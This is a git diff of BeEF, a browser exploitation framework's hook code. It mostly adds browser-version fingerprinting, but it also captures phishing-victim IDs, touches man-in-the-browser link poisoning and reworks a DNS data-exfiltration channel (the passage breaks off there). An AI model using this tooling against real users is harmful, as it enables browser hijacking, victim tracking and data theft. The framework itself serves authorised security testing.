+        return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 38) ? true : false);
+    },
+
+    /**
+     * Returns true if Chrome 39.
+     * @example: beef.browser.isC39()
+     */
+    isC39: function () {
+        return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 39) ? true : false);
+    },
+
+    /**
+     * Returns true if Chrome for iOS 39.
+     * @example: beef.browser.isC39iOS()
+     */
+    isC39iOS: function () {
+        return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 39) ? true : false);
+    },
+
 
     /**
      * Returns true if Chrome.
      * @example: beef.browser.isC()
      */
     isC: function () {
-        return this.isC5() || this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16() || this.isC17() || this.isC18() || this.isC19() || this.isC19iOS() || this.isC20() || this.isC20iOS() || this.isC21() || this.isC21iOS() || this.isC22() || this.isC22iOS() || this.isC23() || this.isC23iOS() || this.isC24() || this.isC24iOS() || this.isC25() || this.isC25iOS() || this.isC26() || this.isC26iOS() || this.isC27() || this.isC27iOS() || this.isC28() || this.isC28iOS() || this.isC29() || this.isC29iOS() || this.isC30() || this.isC30iOS() || this.isC31() || this.isC31iOS() || this.isC32() || this.isC32iOS() || this.isC33() || this.isC33iOS() || this.isC34() || this.isC34iOS() || this.isC35() || this.isC35iOS() || this.isC36() || this.isC36iOS();
+        return this.isC5() || this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16() || this.isC17() || this.isC18() || this.isC19() || this.isC19iOS() || this.isC20() || this.isC20iOS() || this.isC21() || this.isC21iOS() || this.isC22() || this.isC22iOS() || this.isC23() || this.isC23iOS() || this.isC24() || this.isC24iOS() || this.isC25() || this.isC25iOS() || this.isC26() || this.isC26iOS() || this.isC27() || this.isC27iOS() || this.isC28() || this.isC28iOS() || this.isC29() || this.isC29iOS() || this.isC30() || this.isC30iOS() || this.isC31() || this.isC31iOS() || this.isC32() || this.isC32iOS() || this.isC33() || this.isC33iOS() || this.isC34() || this.isC34iOS() || this.isC35() || this.isC35iOS() || this.isC36() || this.isC36iOS() || this.isC37() || this.isC37iOS() || this.isC38() || this.isC38iOS() || this.isC39() || this.isC39iOS();
     },
 
     /**
@@ -822,6 +943,19 @@ beef.browser = {
         return this.isO9_52() || this.isO9_60() || this.isO10() || this.isO11() || this.isO12();
     },
 
+    /**
+     * Returns a hash of string keys representing a given capability
+     * @example: beef.browser.capabilities()["navigator.plugins"]
+     */
+    capabilities: function () {
+        var out = {};
+        var type = this.type();
+
+        out["navigator.plugins"] = (type.IE11 || !type.IE);
+
+        return out;
+    },
+
     /**
      * Returns the type of browser being used.
      * @example: beef.browser.type().IE6
@@ -881,7 +1015,13 @@ beef.browser = {
             C35iOS: this.isC35iOS(), // Chrome 35 on iOS
             C36: this.isC36(), // Chrome 36
             C36iOS: this.isC36iOS(), // Chrome 36 on iOS
-            
+            C37: this.isC37(), // Chrome 37
+            C37iOS: this.isC37iOS(), // Chrome 37 on iOS
+            C38: this.isC38(), // Chrome 38
+            C38iOS: this.isC38iOS(), // Chrome 38 on iOS
+            C39: this.isC39(), // Chrome 39
+            C39iOS: this.isC39iOS(), // Chrome 39 on iOS
+
             C: this.isC(), // Chrome any version
 
             FF2: this.isFF2(), // Firefox 2
@@ -911,8 +1051,15 @@ beef.browser = {
             FF24: this.isFF24(), // Firefox 24
             FF25: this.isFF25(), // Firefox 25
             FF26: this.isFF26(), // Firefox 26
-            FF26: this.isFF27(), // Firefox 27
-            FF26: this.isFF28(), // Firefox 28
+            FF27: this.isFF27(), // Firefox 27
+            FF28: this.isFF28(), // Firefox 28
+            FF29: this.isFF29(), // Firefox 29
+            FF30: this.isFF30(), // Firefox 30
+            FF31: this.isFF31(), // Firefox 31
+            FF32: this.isFF32(), // Firefox 32
+            FF33: this.isFF33(), // Firefox 33
+            FF34: this.isFF34(), // Firefox 34
+            FF35: this.isFF35(), // Firefox 35
             FF: this.isFF(),   // Firefox any version
 
             IE6: this.isIE6(), // Internet Explorer 6
@@ -933,6 +1080,8 @@ beef.browser = {
             S4: this.isS4(), // Safari 4.xx
             S5: this.isS5(), // Safari 5.xx
             S6: this.isS6(), // Safari 6.x
+            S7: this.isS7(), // Safari 7.x
+            S8: this.isS8(), // Safari 8.x
             S: this.isS()   // Safari any version
         }
     },
@@ -1145,6 +1294,31 @@ beef.browser = {
             return '36'
         }
         ;   // Chrome 36 for iOS
+        if (this.isC37()) {
+            return '37'
+        }
+        ;   // Chrome 37
+        if (this.isC37iOS()) {
+            return '37'
+        }
+        ;   // Chrome 37 for iOS
+        if (this.isC38()) {
+            return '38'
+        }
+        ;   // Chrome 38
+        if (this.isC38iOS()) {
+            return '38'
+        }
+        ;   // Chrome 38 for iOS
+        if (this.isC39()) {
+            return '39'
+        }
+        ;   // Chrome 39
+        if (this.isC39iOS()) {
+            return '39'
+        }
+        ;   // Chrome 39 for iOS
+
         if (this.isFF2()) {
             return '2'
         }
@@ -1261,6 +1435,34 @@ beef.browser = {
             return '28'
         }
         ;   // Firefox 28
+        if (this.isFF29()) {
+            return '29'
+        }
+        ;   // Firefox 29
+        if (this.isFF30()) {
+            return '30'
+        }
+        ;   // Firefox 30
+        if (this.isFF31()) {
+            return '31'
+        }
+        ;   // Firefox 31
+        if (this.isFF32()) {
+            return '32'
+        }
+        ;   // Firefox 32
+        if (this.isFF33()) {
+            return '33'
+        }
+        ;   // Firefox 33
+        if (this.isFF34()) {
+            return '34'
+        }
+        ;   // Firefox 34
+        if (this.isFF35()) {
+            return '35'
+        }
+        ;   // Firefox 35
 
         if (this.isIE6()) {
             return '6'
@@ -1300,6 +1502,15 @@ beef.browser = {
         }
         ;	// Safari 6
 
+        if (this.isS7()) {
+            return '7'
+        }
+        ;	// Safari 7
+        if (this.isS8()) {
+            return '8'
+        }
+        ;       // Safari 8
+
         if (this.isO9_52()) {
             return '9.5'
         }
@@ -1419,8 +1630,7 @@ beef.browser = {
 
         var quicktime = false;
 
-        // Not Internet Explorer
-        if (!this.type().IE) {
+        if (this.capabilities()["navigator.plugins"]) {
 
             for (i = 0; i < navigator.plugins.length; i++) {
 
@@ -1430,7 +1640,7 @@ beef.browser = {
 
             }
 
-            // Internet Explorer
+            // Has navigator.plugins
         } else {
 
             try {
@@ -1461,8 +1671,8 @@ beef.browser = {
 
         var realplayer = false;
 
-        // Not Internet Explorer
-        if (!this.type().IE) {
+        if (this.capabilities()["navigator.plugins"]) {
+
 
             for (i = 0; i < navigator.plugins.length; i++) {
 
@@ -1472,7 +1682,7 @@ beef.browser = {
 
             }
 
-            // Internet Explorer
+            // has navigator.plugins
         } else {
 
             var definedControls = [
@@ -1512,8 +1722,8 @@ beef.browser = {
 
         var wmp = false;
 
-        // Not Internet Explorer
-        if (!this.type().IE) {
+        if (this.capabilities()["navigator.plugins"]) {
+
 
             for (i = 0; i < navigator.plugins.length; i++) {
 
@@ -1523,7 +1733,7 @@ beef.browser = {
 
             }
 
-            // Internet Explorer
+            // Has navigator.plugins
         } else {
 
             try {
@@ -1656,8 +1866,8 @@ beef.browser = {
             return r;
         };
 
-        // Internet Explorer
-        if (this.isIE()) this.getPluginsIE();
+        // Things lacking navigator.plugins
+        if (!this.capabilities()["navigator.plugins"]) this.getPluginsIE();
 
         // All other browsers that support navigator.plugins
         else if (navigator.plugins && navigator.plugins.length > 0) {
@@ -1943,7 +2153,17 @@ beef.browser = {
         var page_uri = (document.location.href) ? document.location.href : "Unknown";
         var page_referrer = (document.referrer) ? document.referrer : "Unknown";
         var hostname = (document.location.hostname) ? document.location.hostname : "Unknown";
-        var hostport = (document.location.port) ? document.location.port : "80";
+        switch (document.location.protocol) {
+            case "http:":
+                var default_port = "80";
+                break;
+            case "https:":
+                var default_port = "443";
+                break
+            default:
+                var default_port = "";
+        }
+        var hostport = (document.location.port) ? document.location.port : default_port;
         var browser_plugins = beef.browser.getPlugins();
         var date_stamp = new Date().toString();
         var os_name = beef.os.getName();
@@ -2017,6 +2237,24 @@ beef.browser = {
         if (has_wmp) details['HasWMP'] = has_wmp;
         if (has_foxit) details['HasFoxit'] = has_foxit;
 
+        var pf_integration = "<%= @phishing_frenzy_enable %>";
+        if (pf_integration) {
+            var pf_param = "uid";
+            var pf_victim_uid = "";
+            var location_search = window.location.search.substring(1);
+            var params = location_search.split('&');
+            for (var i = 0; i < params.length; i++) {
+                var param_entry = params[i].split('=');
+                if (param_entry[0] == pf_param) {
+                    pf_victim_uid = param_entry[1];
+                    details['PhishingFrenzyUID'] = pf_victim_uid;
+                    break;
+                }
+            }
+        } else {
+            details['PhishingFrenzyUID'] = "N/A";
+        }
+
         return details;
     },
 
@@ -2218,11 +2456,12 @@ beef.browser = {
     /**
      * Get the browser language
      */
-    getBrowserLanguage: function(){
+    getBrowserLanguage: function () {
         var l = 'Unknown';
-        try{
-          l = window.navigator.userLanguage || window.navigator.language;
-        }catch(e){}
+        try {
+            l = window.navigator.userLanguage || window.navigator.language;
+        } catch (e) {
+        }
         return l;
     },
 

core/main/client/browser/cookie.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //

core/main/client/browser/popup.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //

core/main/client/dom.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //

core/main/client/encode/base64.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //

core/main/client/encode/json.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //

core/main/client/geolocation.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //

core/main/client/hardware.js

@@ -1,129 +1,159 @@
 //
-// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
 
 beef.hardware = {
 
-	ua: navigator.userAgent,
+  ua: navigator.userAgent,
 
-	cpuType: function() {
-		// IE
-		if (typeof navigator.cpuClass != 'undefined') {
-			cpu = navigator.cpuClass;
-			if (cpu == "x86")   return "32-bit";
-			if (cpu == "68K")   return "Motorola 68K";
-			if (cpu == "PPC")   return "Motorola PPC";
-			if (cpu == "Alpha") return "Digital";
-			if (this.ua.match('Win64; IA64')) return "64-bit (Intel)";
-			if (this.ua.match('Win64; x64'))  return "64-bit (AMD)";
-		// Firefox
+  /*
+   * @return: {String} CPU type
+   **/
+  cpuType: function() {
+    // IE
+    if (typeof navigator.cpuClass != 'undefined') {
+      cpu = navigator.cpuClass;
+      if (cpu == "x86")   return "32-bit";
+      if (cpu == "68K")   return "Motorola 68K";
+      if (cpu == "PPC")   return "Motorola PPC";
+      if (cpu == "Alpha") return "Digital";
+      if (this.ua.match('Win64; IA64')) return "64-bit (Intel)";
+      if (this.ua.match('Win64; x64'))  return "64-bit (AMD)";
+    // Firefox
         } else if (typeof navigator.oscpu != 'undefined') {
-			if (navigator.oscpu.match('(WOW64|x64|x86_64)')) return "64-bit";
-		}
-		if (navigator.platform.toLowerCase() == "win64") return "64-bit";
-		return "32-bit";
-	},
+      if (navigator.oscpu.match('(WOW64|x64|x86_64)')) return "64-bit";
+    }
+    if (navigator.platform.toLowerCase() == "win64") return "64-bit";
+    return "32-bit";
+  },
 
-	isTouchEnabled: function() {
-		if ('ontouchstart' in document) return true;
-		return false;
-	},
+  /*
+   * @return: {Boolean} true or false.
+   **/
+  isTouchEnabled: function() {
+    if ('ontouchstart' in document) return true;
+    return false;
+  },
 
-	isVirtualMachine: function() {
-		if (screen.width % 2 || screen.height % 2) return true;
-		return false;
-	},
+  /*
+   * @return: {Boolean} true or false.
+   **/
+  isVirtualMachine: function() {
+    if (screen.width % 2 || screen.height % 2) return true;
+    return false;
+  },
 
-	isLaptop: function() {
-		// Most common laptop screen resolution
-		if (screen.width == 1366 && screen.height == 768) return true;
-		// Netbooks
-		if (screen.width == 1024 && screen.height == 600) return true;
-		return false;
-	},
+  /*
+   * @return: {Boolean} true or false.
+   **/
+  isLaptop: function() {
+    // Most common laptop screen resolution
+    if (screen.width == 1366 && screen.height == 768) return true;
+    // Netbooks
+    if (screen.width == 1024 && screen.height == 600) return true;
+    return false;
+  },
 
-	isNokia: function() {
-		return (this.ua.match('(Maemo Browser)|(Symbian)|(Nokia)')) ? true : false;
-	},
+  /*
+   * @return: {Boolean} true or false.
+   **/
+  isNokia: function() {
+    return (this.ua.match('(Maemo Browser)|(Symbian)|(Nokia)')) ? true : false;
+  },
 
-	isZune: function() {
-		return (this.ua.match('ZuneWP7')) ? true : false;
-	},
+  /*
+   * @return: {Boolean} true or false.
+   **/
+  isZune: function() {
+    return (this.ua.match('ZuneWP7')) ? true : false;
+  },
 
-	isHtc: function() {
-		return (this.ua.match('HTC')) ? true : false;
-	},
+  /*
+   * @return: {Boolean} true or false.
+   **/
+  isHtc: function() {
+    return (this.ua.match('HTC')) ? true : false;
+  },
 
-	isEricsson: function() {
-		return (this.ua.match('Ericsson')) ? true : false;
-	},
+  /*
+   * @return: {Boolean} true or false.
+   **/
+  isEricsson: function() {
+    return (this.ua.match('Ericsson')) ? true : false;
+  },
 
-	isMotorola: function() {
-		return (this.ua.match('Motorola')) ? true : false;
-	},
+  /*
+   * @return: {Boolean} true or false.
+   **/
+  isMotorola: function() {
+    return (this.ua.match('Motorola')) ? true : false;
+  },
 
-	isGoogle: function() {
-		return (this.ua.match('Nexus One')) ? true : false;
-	},
+  /*
+   * @return: {Boolean} true or false.
+   **/
+  isGoogle: function() {
+    return (this.ua.match('Nexus One')) ? true : false;
+  },
 
-        /**
-         * Returns true if the browser is on a Mobile Phone
-         * @return: {Boolean} true or false
-         *
-         * @example: if(beef.hardware.isMobilePhone()) { ... }
-         **/
-        isMobilePhone: function() {
-            return DetectMobileQuick();
-        },
+  /**
+   * Returns true if the browser is on a Mobile Phone
+   * @return: {Boolean} true or false
+   *
+   * @example: if(beef.hardware.isMobilePhone()) { ... }
+   **/
+  isMobilePhone: function() {
+    return DetectMobileQuick();
+  },
 
-	getName: function() {
-                var ua = navigator.userAgent.toLowerCase();
-                if(DetectIphone())              { return "iPhone"};
-                if(DetectIpod())                { return "iPod Touch"};
-                if(DetectIpad())                { return "iPad"};
-		if (this.isHtc())               { return 'HTC'};
-		if (this.isMotorola())          { return 'Motorola'};
-		if (this.isZune())              { return 'Zune'};
-		if (this.isGoogle())            { return 'Google Nexus One'};
-		if (this.isEricsson())          { return 'Ericsson'};
-                if(DetectAndroidPhone())        { return "Android Phone"};
-                if(DetectAndroidTablet())       { return "Android Tablet"};
-                if(DetectS60OssBrowser())       { return "Nokia S60 Open Source"};
-                if(ua.search(deviceS60) > -1)   { return "Nokia S60"};
-                if(ua.search(deviceS70) > -1)   { return "Nokia S70"};
-                if(ua.search(deviceS80) > -1)   { return "Nokia S80"};
-                if(ua.search(deviceS90) > -1)   { return "Nokia S90"};
-                if(ua.search(deviceSymbian) > -1)   { return "Nokia Symbian"};
-		if (this.isNokia())             { return 'Nokia'};
-                if(DetectWindowsPhone7())       { return "Windows Phone 7"};
-                if(DetectWindowsMobile())       { return "Windows Mobile"};
-                if(DetectBlackBerryTablet())    { return "BlackBerry Tablet"};
-                if(DetectBlackBerryWebKit())    { return "BlackBerry OS 6"};
-                if(DetectBlackBerryTouch())     { return "BlackBerry Touch"};
-                if(DetectBlackBerryHigh())      { return "BlackBerry OS 5"};
-                if(DetectBlackBerry())          { return "BlackBerry"};
-                if(DetectPalmOS())              { return "Palm OS"};
-                if(DetectPalmWebOS())           { return "Palm Web OS"};
-                if(DetectGarminNuvifone())      { return "Gamin Nuvifone"};
-                if(DetectArchos())              { return "Archos"}
-                if(DetectBrewDevice())          { return "Brew"};
-                if(DetectDangerHiptop())        { return "Danger Hiptop"};
-                if(DetectMaemoTablet())         { return "Maemo Tablet"};
-                if(DetectSonyMylo())            { return "Sony Mylo"};
-                if(DetectAmazonSilk())          { return "Kindle Fire"};
-                if(DetectKindle())              { return "Kindle"};
-                if(DetectSonyPlaystation())                 { return "Playstation"};
-                if(ua.search(deviceNintendoDs) > -1)        { return "Nintendo DS"};
-                if(ua.search(deviceWii) > -1)               { return "Nintendo Wii"};
-                if(ua.search(deviceNintendo) > -1)          { return "Nintendo"};
-                if(DetectXbox())                            { return "Xbox"};
-				if(this.isLaptop())							{ return "Laptop"};
-                if(this.isVirtualMachine())                 { return "Virtual Machine"};
+  getName: function() {
+    var ua = navigator.userAgent.toLowerCase();
+    if(DetectIphone())              { return "iPhone"};
+    if(DetectIpod())                { return "iPod Touch"};
+    if(DetectIpad())                { return "iPad"};
+    if (this.isHtc())               { return 'HTC'};
+    if (this.isMotorola())          { return 'Motorola'};
+    if (this.isZune())              { return 'Zune'};
+    if (this.isGoogle())            { return 'Google Nexus One'};
+    if (this.isEricsson())          { return 'Ericsson'};
+    if(DetectAndroidPhone())        { return "Android Phone"};
+    if(DetectAndroidTablet())       { return "Android Tablet"};
+    if(DetectS60OssBrowser())       { return "Nokia S60 Open Source"};
+    if(ua.search(deviceS60) > -1)   { return "Nokia S60"};
+    if(ua.search(deviceS70) > -1)   { return "Nokia S70"};
+    if(ua.search(deviceS80) > -1)   { return "Nokia S80"};
+    if(ua.search(deviceS90) > -1)   { return "Nokia S90"};
+    if(ua.search(deviceSymbian) > -1)   { return "Nokia Symbian"};
+    if (this.isNokia())             { return 'Nokia'};
+    if(DetectWindowsPhone7())       { return "Windows Phone 7"};
+    if(DetectWindowsMobile())       { return "Windows Mobile"};
+    if(DetectBlackBerryTablet())    { return "BlackBerry Tablet"};
+    if(DetectBlackBerryWebKit())    { return "BlackBerry OS 6"};
+    if(DetectBlackBerryTouch())     { return "BlackBerry Touch"};
+    if(DetectBlackBerryHigh())      { return "BlackBerry OS 5"};
+    if(DetectBlackBerry())          { return "BlackBerry"};
+    if(DetectPalmOS())              { return "Palm OS"};
+    if(DetectPalmWebOS())           { return "Palm Web OS"};
+    if(DetectGarminNuvifone())      { return "Gamin Nuvifone"};
+    if(DetectArchos())              { return "Archos"}
+    if(DetectBrewDevice())          { return "Brew"};
+    if(DetectDangerHiptop())        { return "Danger Hiptop"};
+    if(DetectMaemoTablet())         { return "Maemo Tablet"};
+    if(DetectSonyMylo())            { return "Sony Mylo"};
+    if(DetectAmazonSilk())          { return "Kindle Fire"};
+    if(DetectKindle())              { return "Kindle"};
+    if(DetectSonyPlaystation())                 { return "Playstation"};
+    if(ua.search(deviceNintendoDs) > -1)        { return "Nintendo DS"};
+    if(ua.search(deviceWii) > -1)               { return "Nintendo Wii"};
+    if(ua.search(deviceNintendo) > -1)          { return "Nintendo"};
+    if(DetectXbox())                            { return "Xbox"};
+    if(this.isLaptop())                         { return "Laptop"};
+    if(this.isVirtualMachine())                 { return "Virtual Machine"};
 
-		return 'Unknown';
-	}
+    return 'Unknown';
+  }
 };
 
 beef.regCmp('beef.hardware');

core/main/client/init.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //

core/main/client/lib/evercookie.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //

core/main/client/lib/webrtcadapter.js

@@ -0,0 +1,200 @@
+var RTCPeerConnection = null;
+var getUserMedia = null;
+var attachMediaStream = null;
+var reattachMediaStream = null;
+var webrtcDetectedBrowser = null;
+var webrtcDetectedVersion = null;
+
+function maybeFixConfiguration(pcConfig) {
+  if (pcConfig === null) {
+    return;
+  }
+  for (var i = 0; i < pcConfig.iceServers.length; i++) {
+    if (pcConfig.iceServers[i].hasOwnProperty('urls')){
+      if (pcConfig.iceServers[i]['urls'].length > 0) {
+        // In FF - we just take the FIRST STUN Server
+        pcConfig.iceServers[i]['url'] = pcConfig.iceServers[i]['urls'][0];
+      } else {
+        pcConfig.iceServers[i]['url'] = pcConfig.iceServers[i]['urls'];
+      }
+      delete pcConfig.iceServers[i]['urls'];
+    }
+  }
+}
+
+if (navigator.mozGetUserMedia) {
+
+  webrtcDetectedBrowser = "firefox";
+
+  webrtcDetectedVersion =
+           parseInt(navigator.userAgent.match(/Firefox\/([0-9]+)\./)[1], 10);
+
+  // The RTCPeerConnection object.
+  var RTCPeerConnection = function(pcConfig, pcConstraints) {
+    // .urls is not supported in FF yet.
+    maybeFixConfiguration(pcConfig);
+    return new mozRTCPeerConnection(pcConfig, pcConstraints);
+  }
+
+  // The RTCSessionDescription object.
+  RTCSessionDescription = mozRTCSessionDescription;
+
+  // The RTCIceCandidate object.
+  RTCIceCandidate = mozRTCIceCandidate;
+
+  // Get UserMedia (only difference is the prefix).
+  // Code from Adam Barth.
+  getUserMedia = navigator.mozGetUserMedia.bind(navigator);
+  navigator.getUserMedia = getUserMedia;
+
+  // Creates iceServer from the url for FF.
+  createIceServer = function(url, username, password) {
+    var iceServer = null;
+    var url_parts = url.split(':');
+    if (url_parts[0].indexOf('stun') === 0) {
+      // Create iceServer with stun url.
+      iceServer = { 'url': url };
+    } else if (url_parts[0].indexOf('turn') === 0) {
+      if (webrtcDetectedVersion < 27) {
+        // Create iceServer with turn url.
+        // Ignore the transport parameter from TURN url for FF version <=27.
+        var turn_url_parts = url.split("?");
+        // Return null for createIceServer if transport=tcp.
+        if (turn_url_parts.length === 1 ||
+            turn_url_parts[1].indexOf('transport=udp') === 0) {
+          iceServer = {'url': turn_url_parts[0],
+                       'credential': password,
+                       'username': username};
+        }
+      } else {
+        // FF 27 and above supports transport parameters in TURN url,
+        // So passing in the full url to create iceServer.
+        iceServer = {'url': url,
+                     'credential': password,
+                     'username': username};
+      }
+    }
+    return iceServer;
+  };
+
+  createIceServers = function(urls, username, password) {
+    var iceServers = [];
+    // Use .url for FireFox.
+    for (i = 0; i < urls.length; i++) {
+      var iceServer = createIceServer(urls[i],
+                                      username,
+                                      password);
+      if (iceServer !== null) {
+        iceServers.push(iceServer);
+      }
+    }
+    return iceServers;
+  }
+
+  // Attach a media stream to an element.
+  attachMediaStream = function(element, stream) {
+    console.log("Attaching media stream");
+    element.mozSrcObject = stream;
+    element.play();
+  };
+
+  reattachMediaStream = function(to, from) {
+    console.log("Reattaching media stream");
+    to.mozSrcObject = from.mozSrcObject;
+    to.play();
+  };
+
+  // Fake get{Video,Audio}Tracks
+  if (!MediaStream.prototype.getVideoTracks) {
+    MediaStream.prototype.getVideoTracks = function() {
+      return [];
+    };
+  }
+
+  if (!MediaStream.prototype.getAudioTracks) {
+    MediaStream.prototype.getAudioTracks = function() {
+      return [];
+    };
+  }
+} else if (navigator.webkitGetUserMedia) {
+
+  webrtcDetectedBrowser = "chrome";
+  // Temporary fix until crbug/374263 is fixed.
+  // Setting Chrome version to 999, if version is unavailable.
+  var result = navigator.userAgent.match(/Chrom(e|ium)\/([0-9]+)\./);
+  if (result !== null) {
+    webrtcDetectedVersion = parseInt(result[2], 10);
+  } else {
+    webrtcDetectedVersion = 999;
+  }
+
+  // Creates iceServer from the url for Chrome M33 and earlier.
+  createIceServer = function(url, username, password) {
+    var iceServer = null;
+    var url_parts = url.split(':');
+    if (url_parts[0].indexOf('stun') === 0) {
+      // Create iceServer with stun url.
+      iceServer = { 'url': url };
+    } else if (url_parts[0].indexOf('turn') === 0) {
+      // Chrome M28 & above uses below TURN format.
+      iceServer = {'url': url,
+                   'credential': password,
+                   'username': username};
+    }
+    return iceServer;
+  };
+
+  // Creates iceServers from the urls for Chrome M34 and above.
+  createIceServers = function(urls, username, password) {
+    var iceServers = [];
+    if (webrtcDetectedVersion >= 34) {
+      // .urls is supported since Chrome M34.
+      iceServers = {'urls': urls,
+                    'credential': password,
+                    'username': username };
+    } else {
+      for (i = 0; i < urls.length; i++) {
+        var iceServer = createIceServer(urls[i],
+                                        username,
+                                        password);
+        if (iceServer !== null) {
+          iceServers.push(iceServer);
+        }
+      }
+    }
+    return iceServers;
+  };
+
+  // The RTCPeerConnection object.
+  var RTCPeerConnection = function(pcConfig, pcConstraints) {
+    // .urls is supported since Chrome M34.
+    if (webrtcDetectedVersion < 34) {
+      maybeFixConfiguration(pcConfig);
+    }
+    return new webkitRTCPeerConnection(pcConfig, pcConstraints);
+  }
+
+  // Get UserMedia (only difference is the prefix).
+  // Code from Adam Barth.
+  getUserMedia = navigator.webkitGetUserMedia.bind(navigator);
+  navigator.getUserMedia = getUserMedia;
+
+  // Attach a media stream to an element.
+  attachMediaStream = function(element, stream) {
+    if (typeof element.srcObject !== 'undefined') {
+      element.srcObject = stream;
+    } else if (typeof element.mozSrcObject !== 'undefined') {
+      element.mozSrcObject = stream;
+    } else if (typeof element.src !== 'undefined') {
+      element.src = URL.createObjectURL(stream);
+    } else {
+      console.log('Error attaching stream to element.');
+    }
+  };
+
+  reattachMediaStream = function(to, from) {
+    to.src = from.src;
+  };
+} else {
+  console.log("Browser does not appear to be WebRTC-capable");
+}

core/main/client/logger.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //

core/main/client/mitb.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
@@ -106,7 +106,7 @@ beef.mitb = {
                 history.pushState({ Be:"EF" }, title, e.currentTarget);
             }
         } catch (e) {
-            console.error('beef.mitb.poisonAnchor - failed to execute: ' + e.message);
+            beef.debug('beef.mitb.poisonAnchor - failed to execute: ' + e.message);
         }
         return false;
     },
@@ -219,4 +219,4 @@ beef.mitb = {
     }
 };
 
-beef.regCmp('beef.mitb');
+beef.regCmp('beef.mitb');

core/main/client/net.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //

core/main/client/net/dns.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
@@ -18,49 +18,70 @@ beef.net.dns = {
 
 	handler: "dns",
 
-	send: function(msgId, messageString, domain, wait, callback) {
+	send: function(msgId, data, domain, callback) {
 
-		var dom = document.createElement('b');
+        var encode_data = function(str) {
+            var result="";
+            for(i=0;i<str.length;++i) {
+                result+=str.charCodeAt(i).toString(16).toUpperCase();
+            }
+            return result;
+        };
 
-		// DNS settings
-		var max_domain_length = 255-5-5-5-5-5;
-		var max_segment_length = max_domain_length - domain.length;
+        var encodedData = encodeURI(encode_data(data));
 
-		// splits strings into chunks
-		String.prototype.chunk = function(n) {
-			if (typeof n=='undefined') n=100;
-			return this.match(RegExp('.{1,'+n+'}','g'));
-		};
+        //TODO remove this
+        console.log(encodedData);
+        console.log("_encodedData_ length: " + encodedData.length);
 
-		// XORs a string
-		xor_encrypt = function(str, key) {
-			var result="";
-			for(i=0;i<str.length;++i) {
-				result+=String.fromCharCode(key^str.charCodeAt(i));
-			}
-			return result;
-		};
+        // limitations to DNS according to RFC 1035:
+        // o Domain names must only consist of a-z, A-Z, 0-9, hyphen (-) and fullstop (.) characters
